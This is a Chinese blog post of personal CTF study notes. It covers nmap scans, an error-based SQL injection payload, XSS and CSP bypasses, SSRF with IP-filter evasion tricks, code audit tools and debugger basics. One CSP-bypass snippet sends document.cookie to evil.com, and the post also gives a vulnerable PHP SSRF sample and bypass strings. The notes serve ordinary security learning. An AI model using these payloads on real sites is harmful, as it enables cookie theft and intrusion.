CTF学习

Web

nmap

nmap常用的扫描命令是:

nmap -sS -sV-p- 192.168.1.1

nmap -v -T4 -A 192.168.1.1/24

Sql注入

利用报错注入:

updatexml:爆破数据库版本Payload:

?id=1'+updatexml(1,concat(0x7e,(SELECT version()),0x7e),1)%23

常见的注入点位置:

GET参数:最容易发现

POST:通过抓包来发现,Burp或浏览器插件Hackbar发POST包

User-Agent:Burp的Repeater模块或Sqlmap

Cookies:Burp的Repeater模块或Sqlmap

注入的检测;

插入单引号

数字型判断

通过数字的加减判断

XSS跨站脚本攻击

反射型、存储型、DOM型

绕过CSP

大部分网站跳转还是要依赖前端来进行,所以在CSP中无法对location.href做出限制,一次可以衍生出大量的绕过方式:

// bypass 1

// bypass 2

var a=document.createElement("a");

a.href='http://evil.com/cookie.php?cookie='+escape(document.cookie);

document.body.appendChild(a);

a.click();

// bypass 3

服务器请求伪造(SSRF)

示例:

ssrf.php:

$url = $_GET['url'];

echo file_get_contents($url);

?>

当请求:

http://example.com/ssrf.php?url=http://192.168.252.1:8000/

就能够获取到服务器/目录的文件

绕过正则:

http://example.com@evil.com

绕过内网IP地址过滤:

127.0.0.1的替代写法:

八进制:0177.00.00.01

十进制:2130706433

十六进制:0x7f.0x0.0x0.0x1

省略写法: 127.1

或配置域名:

evil.example.com=>10.0.18.3

特性利用

PHP语言特性

Windows系统特性

代码审计

源码泄露

常见备份文件

Github

svn

利用漏洞泄露

代码审计

工具

收费:RIPS,价格不菲,也有开源版,但是有缺点

免费:Seay源代码审计系统,自动审计的过程主要是根据各种正则表达式匹配结果是否存在漏洞

其他:安全狗、D盾、护卫神等Webshell工具扫描

逆向工程

逆向工程是我比较喜欢的方向,之前也做过一些研究,这次学习就细心点吧。

Ollydbg

断点

分类:

一般断点:

int3指令

F2键快速下断点

也可以使用命令行:bp xxxxxx或者bp MessageBoxA

内存断点:

内存访问和内存写入,OD每一时刻只允许一个内存断点

硬件断点:

硬件访问、硬件写入、硬件执行,最多设置4个硬件断点

快捷键

F9:运行程序

F7:单步跟踪(进入),一条条执行,遇到call会进入执行

F8:但不跟踪(步过),遇到call不会进入

F4:执行到所选代码

Alt+F9:执行到程序领空,主要用于在dll或其他调用库时快速回到主程序领空

gdb

在Linux下调试程序必备,默认情况下,Linux都会自动安装,如果没有,手动安装:

sudo apt-get install gdb

sudo apt-get install gdb-multiarch

插件:peda、gef、pwndbg,都可以在github上面找到

IDA Pro

暂时先写到这,工作考研,我哭了-_-

sql注入pythonpoco_ctf学习相关推荐

  1. Web安全之SQL注入漏洞学习(一)

    Web程序三层架构 三层架构主要是指将业务应用规划为的表示层 UI.数据访问层 DAL 以及业务逻辑层 BLL,其分层的核心任务是"高内聚低耦合"的实现.在软件体系架构设计中,分层 ...

  2. 基于pikachu漏洞平台的 --SQL注入攻击学习与总结

    SQL注入攻击 基础知识 常见注释符号 使用示例 pikachu 漏洞联系平台 -- SQL注入 SQL注入攻击流程 注入点类型 数字型注入(POST) 字符型注入(GET) 搜索型注入 XX型注入 ...

  3. 山东大学软件学院2022项目实训——(四)SQL注入的学习

    目录 (一)什么是SQL注入 (二)SQL注入的类型 (三)SQL注入的危害 (四)SQL注入的防护 1.分级管理 2.参数传值 3.基础过滤与二次过滤 4.使用安全参数 5.漏洞扫描 6.多层验证 ...

  4. 防止SQL注入攻击-学习笔记

    所谓SQL注入,就是通过把SQL命令插入到web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令. 具体来说,它是利用现有应有程序,将(恶意的)SQL命令注入到后台数据 ...

  5. 开普勒sql注入靶场学习

    0x00 靶场搭建 下载地址 https://github.com/admin360bug/PHP 安装方法 导入localhost.sql数据库 修改APP/mysql.class.php 数据库配 ...

  6. Web安全之SQL注入漏洞学习(七)-堆叠注入

    堆叠注入简介 堆叠注入是指注入的多条SQL语句可以一起执行.MySQL命令行中, 每一条语句结尾加; 表示语句结束.这样是不是可以多句一起使用.这个叫做 stacked injection. 堆叠注入 ...

  7. SQL注入攻击及防御 手动注入+sqlmap自动化注入实战(网络安全学习12)

    CONTENTS 1 项目实验环境 2 SQL注入概述 2.1 SQL注入简介 2.2 SQL注入的危害 3 SQL基础回顾 3.1 联合查询union 3.2 information_schema数 ...

  8. [转]数据安全之SQL注入资料整理

    SQL注入是从正常的WWW端口访问,而且表面看起来跟一般的Web页面访问没什么区别, 所以目前市面的防火墙都不会对SQL注入发出警报,如果管理员没查看IIS日志的习惯,可能被入侵很长时间都不会发觉. ...

  9. supersqli(SQL注入流程及常用SQL语句)

    目录 一.SQL注入知识学习 1.判断注入类型 (1)数字型注入判断 (2)字符型注入判断 2.猜解sql查询语句中的字段数(order by 的使用) 3.判断显示位爆数据库的名字 4.注释(--+ ...

最新文章

  1. mysql存储base64位用什么类型_了解什么是存储引擎引发的MySQL面试3连问
  2. SylixOS 无Uboot版BSP
  3. 每年考研计算机专硕和学硕报比例,各院校研招计划发布 专硕与学硕比例调整...
  4. python小波变换尺度函数_Python图像处理(17):pyWavelet
  5. antd 获取table选中行数据_element-ui 组件el-table默认选中行setCurrentRow采坑记
  6. 如何在CDH5上部署Dolphin Scheduler 1.3.1
  7. Linux源码Kconfig文件语法分析
  8. oracle 二进制与运算,Oracle怎么操作进行二进制的比对
  9. 记录一次游戏服务器的压测调优记录(Golang语言)
  10. jQuery实例——表格隔行换色
  11. linux 下安装wps
  12. 阿里云产品分析(PPT)
  13. [COGS 2479] [HZOI 2016] 偏序
  14. 微信支付 H5 版本 PHP
  15. java for 死循环_关于java编程死循环的应用
  16. python诗歌文件格式处理_python实现诗歌游戏(类继承)
  17. 学软件嵌入式需要学c语言吗,嵌入式软件工程师需要学什么?
  18. SQLRecoverableException: Closed Connection
  19. 浅谈用户全生命周期管理
  20. 一个登录页面的测试用例(借鉴他人的,方便查阅)

热门文章

  1. “安防+人工智能”,安企选择哪种抱大腿姿势才有出息?
  2. passed into methods by value java专题
  3. mac vim 配置文件
  4. OSChina 周日乱弹 —— 在宅的路上越走越远。。。
  5. zend studio一些常用配置
  6. 欣赏下国外人css3打造的载入动画
  7. SWT学生成绩管理系统
  8. OSPF外部路由汇总
  9. 《javascript入门学习笔记全集》【汇总】
  10. 谈谈入职新公司1月的体会